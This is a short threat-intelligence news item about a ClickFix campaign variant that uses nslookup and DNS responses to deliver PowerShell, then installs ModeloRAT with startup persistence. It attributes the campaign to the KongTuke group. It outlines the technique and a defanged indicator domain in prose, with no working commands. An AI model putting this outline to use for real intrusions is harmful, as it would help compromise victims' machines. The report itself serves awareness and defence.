96/69 Tuesday, February 17, 2026
Microsoft Threat Intelligence has identified a new variant of the ClickFix social engineering campaign that shifts from delivering malware over HTTP to using DNS as a staging channel. Victims are tricked into opening the Windows Run dialog (Win+R) and executing the nslookup command, which connects to a DNS server controlled by the attackers. The malicious payload is embedded within the “Name:” field of the DNS response and is then processed to execute PowerShell commands directly on the victim’s machine. By leveraging standard DNS traffic, attackers can better blend malicious activity with legitimate network communications and evade traditional web-based detection mechanisms.
Once the initial PowerShell script is executed, the system downloads a ZIP file from an external server—such as azwsappdev[.]com—to deploy a remote access trojan (RAT) called ModeloRAT, developed in Python. The malware begins reconnaissance activities to collect system and network information and establishes persistence mechanisms by creating VBScript files and startup shortcuts in the Windows Startup folder, ensuring it runs automatically each time the system boots.
Researchers from Huntress and SC Media report that ModeloRAT and related variants such as CrashFix are linked to the KongTuke threat group, which primarily targets organizations. The campaign uses fake notification pages—such as counterfeit Google Meet alerts or PDF repair tools—to trick victims into manually copying and executing malicious commands. Security experts strongly advise users to avoid running commands in the Run dialog or Terminal based on instructions from suspicious websites to reduce the risk of compromise.
